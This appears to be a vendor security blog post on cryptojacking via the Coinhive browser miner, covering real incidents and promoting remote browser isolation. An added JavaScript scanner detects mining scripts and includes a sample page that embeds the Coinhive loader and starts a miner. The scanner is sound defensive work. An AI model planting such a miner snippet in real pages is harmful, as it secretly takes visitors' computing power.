What’s Mined is Mine

Joe CISO on January 18, 2018

Cryptojacking becomes the malware du jour

It seems that everywhere you look these days, everyone is talking about a shiny new digital medium: cryptocurrencies. Highly reliable despite the lack of a central issuing authority, cryptocurrencies—Bitcoin, Monero, Ethereum, Litecoin, Ripple, and several others—employ blockchain technology to ensure that every transaction is verified and recorded in a distributed public ledger. New cryptocurrency is created by “mining”, the process of adding transaction records (“blocks”) to the currency’s public ledger of past transactions. Mining is computer resource-intensive, but with special software and enough computer power, miners can create new blocks and earn cryptocurrency.

Mining has become a very big business—in fact, a digital gold rush. Every day, the race toward block-creation begins anew with over half a billion people competing worldwide. The winners make money, the losers don’t.

As you would expect, over time, as more people compete harder for the crypto-gold that is increasing in value, more and more computer horsepower is required to win the race.

When the most successful cryptocurrency, Bitcoin, was in its infancy, you could use your own PC to mine for it and make some money. Today, successful Bitcoin mining requires supercomputer power well beyond what you and I can muster from our PCs and laptops. Mining newer cryptocoinage can still be undertaken with moderate computer cycles—at least until the new currencies either melt away or become valuable enough to attract their own armies of competing miners—and then, like Bitcoin, they will demand abundant computer horsepower to get into the race.

There’s Gold in Them Thar Digital Hills

Hackers will be hackers, and miners are no different. Enterprising miners who want to go after expensive cryptocurrencies have developed methods of harnessing hundreds and even thousands of PCs to work together, accumulating the power and speed needed to win the next mining race and stake their claim to crypto-gold. By harnessing the accumulated compute power of unsuspecting Internet users, website owners and web hackers alike are able to compete for cryptocurrency rewards.

How do they commandeer our computers and how do they get away with it?

Welcome to the wonderful world of cryptojacking. Using readily available JavaScript libraries, today’s digital miners can hijack other devices to do their mining for them, kind of like furnishing drills and pickaxes to the gold-diggers of old. Only these tools are digital, easy to install and very effective. This provides a highly tempting new source of revenue to legitimate website owners, who have seen advertising revenues steadily decrease with the rise of AdBlocker plug-ins, not to mention just plain “banner blindness”.

The leading provider of mining-software libraries, Coinhive, even markets itself to website owners as a way to “run your site without ads”. Website owners are tempted to place Coinhive mining JavaScript on their websites. When you and I come to visit, we load the web page and the in-browser mining code runs. No need to install it and no need to opt in. It just grabs computer cycles from our PCs and runs.
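To make the detection side of this concrete, here is an added example (not code from the original post or from Ericom) of a defender-side scanner that sweeps fetched page HTML for in-browser mining indicators. It assumes the publicly documented Coinhive loader file name (coinhive.min.js) and the CoinHive.Anonymous() constructor as signatures, adds a weaker heuristic for the WebAssembly-plus-Worker pattern that browser miners rely on, and runs against two constructed sample pages:

```javascript
// Added example, not code from the original post or from Ericom: a
// defender-side scanner for cryptojacking indicators in page HTML.
// The Coinhive loader path (coinhive.min.js) and the CoinHive.Anonymous()
// constructor are assumed from the library's public documentation; the
// sample pages below are constructed for this example.

const MINING_INDICATORS = [
  { id: "coinhive-loader", severity: "high",
    pattern: /coinhive\.min\.js/i },
  { id: "coinhive-domain", severity: "high",
    pattern: /https?:\/\/(?:[\w-]+\.)*coinhive\.com(?:[\/?#]|$)/i },
  { id: "coinhive-api", severity: "high",
    pattern: /\bCoinHive\.(?:Anonymous|User|Token)\s*\(/ },
];

// Generic heuristic: a WebAssembly module driven from a Web Worker is how
// in-browser miners reach useful hash rates without freezing the page.
// Legitimate code uses the same pair, so it is reported at medium severity.
function looksLikeWasmWorkerMiner(code) {
  return /\bWebAssembly\./.test(code) && /\bnew\s+Worker\s*\(/.test(code);
}

// Pull every <script> out of the HTML: its src attribute (if any) and its
// inline body. A regex is enough for a sweep over static HTML; a crawler
// that handles real pages would use a DOM parser instead.
function extractScripts(html) {
  const scripts = [];
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ index: scripts.length, src: srcMatch ? srcMatch[1] : null, body: m[2] });
  }
  return scripts;
}

// Scan one page and return a list of findings. Each finding records the
// indicator that fired, its severity, which script it was in, and the
// matched text so an analyst can verify it by hand.
function scanHtml(html) {
  const findings = [];
  for (const script of extractScripts(html)) {
    const targets = [];
    if (script.src) targets.push({ where: "src", text: script.src });
    if (script.body.trim()) targets.push({ where: "inline", text: script.body });

    for (const t of targets) {
      for (const ind of MINING_INDICATORS) {
        const hit = ind.pattern.exec(t.text);
        if (hit) {
          findings.push({ indicator: ind.id, severity: ind.severity,
                          script: script.index, where: t.where, evidence: hit[0] });
        }
      }
      if (t.where === "inline" && looksLikeWasmWorkerMiner(t.text)) {
        findings.push({ indicator: "wasm-worker-heuristic", severity: "medium",
                        script: script.index, where: t.where,
                        evidence: "WebAssembly + new Worker(" });
      }
    }
  }
  return findings;
}

// Collapse findings into a single verdict for alerting.
function verdict(findings) {
  if (findings.some((f) => f.severity === "high")) return "cryptojacking";
  if (findings.length > 0) return "suspicious";
  return "clean";
}

// Constructed sample: a page carrying the Coinhive loader and an inline
// starter (site key is a placeholder), plus one ordinary first-party script.
const SAMPLE_MINING_PAGE = `<!doctype html>
<html><head><title>Constructed sample</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.3 });
  miner.start();
</script>
<script src="/static/app.js"></script>
</head><body><p>Hello</p></body></html>`;

// Constructed sample: the same page without the miner.
const SAMPLE_CLEAN_PAGE = `<!doctype html>
<html><head><title>Constructed sample</title>
<script src="/static/app.js"></script>
</head><body><p>Hello</p></body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  const findings = scanHtml(SAMPLE_MINING_PAGE);
  console.log(verdict(findings), JSON.stringify(findings, null, 2));
}
```

Run on the mining sample, the scanner reports three high-severity findings (loader file, loader domain, and the inline CoinHive.Anonymous call) and a "cryptojacking" verdict; on the clean sample it reports nothing. The signature list is where a real deployment would grow as mining services and their copycats change names, and the WebAssembly heuristic is intentionally kept at medium severity because it will also fire on legitimate compute-heavy web applications.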

Ladies and gentlemen, your computer has just been “cryptojacked” by the website, which is now enjoying your “magnanimous” efforts, along with those of thousands of other site visitors, to help it mine for Bitcoin, Monero, or another cryptocurrency of choice. And you don’t even know it!

Cryptojacking in Motion

This crypto-mining power grab is not always undertaken by website owners. In many cases, cryptojacking is accomplished without their knowledge. We have already heard of several major websites being compromised by hackers, who then surreptitiously planted their cryptojacking scripts. Just last September, we learned that the website of the television network Showtime was involved in cryptojacking. The Coinhive scripts appearing on its website were funneling 30% of the mining proceeds to Coinhive itself, while Showtime kept the remainder. There may be thousands of such sites engaging with Coinhive in this manner.

Another enterprising cryptominer used the WiFi in a Starbucks in Argentina to farm for Monero coins by exploiting customer logins to the coffee chain's free WiFi. A 10-second delay in the login process gave the miner a stealthy window in which to grab a bit of your computer's resources while you sipped your coffee.

Even Google’s SafeBrowse Chrome extension—which purports to block pop-up ads and skip the ad pages that appear before downloads—was discovered to be secretly running a Coinhive mining script in the background. With some 150,000 users routinely using the extension, SafeBrowse was clandestinely making a goodly income for its entrepreneurial developers by exploiting the CPU power of unaware users.

Only a couple of months ago, a copy of the Coinhive in-browser cryptocurrency miner was found inside one of the JavaScript files used by LiveHelpNow, a live chat and support widget. LiveHelpNow is used by companies globally to provide customer support. There is no telling how many large-scale enterprises were exploited in this mining exercise, with or without the knowledge of the company.

Cryptojacking is flourishing, and it is taking over our computer horsepower in the most nefarious of ways.

Putting an End to Cryptojacking

While many users are already fighting back with anti-malware solutions and browser plug-ins, the hackers seem to always be just one step ahead.

Rather than an endless game of catch-up, however, there is a comprehensive solution you can deploy once across your organization to ensure that endpoint devices cannot be exploited in this manner.

Remote Browser Isolation (RBI) leverages virtual browsers that reside in disposable containers outside of the network (usually in the DMZ or the cloud). Unbeknownst to enterprise end users, who might be browsing with anything from Firefox to Chrome, Opera or Edge, the virtual browser renders the webpage far away from the endpoints themselves and streams it back to users in real time, for a native, interactive and secure web browsing experience. The user doesn’t notice any performance degradation, while the endpoint is kept free and clear of Coinhive and other such threats.

Moreover, once the user's browsing session is over or times out, the container in which it runs is simply destroyed, along with any malicious files or processes it may have briefly hosted. So even if a mining hack sneaks in, it’ll have very little time to hog the (relatively limited) processing resources allocated to the container before it, too, is history.

Cryptojackers will just have to find other ways to mine their digital currencies, but not with our endpoints!


Joe CISO

Joe CISO is the information security professional responsible for protecting the organization from all cyber threats, including ransomware, drive-by downloads and zero-day exploits. | Ericom Software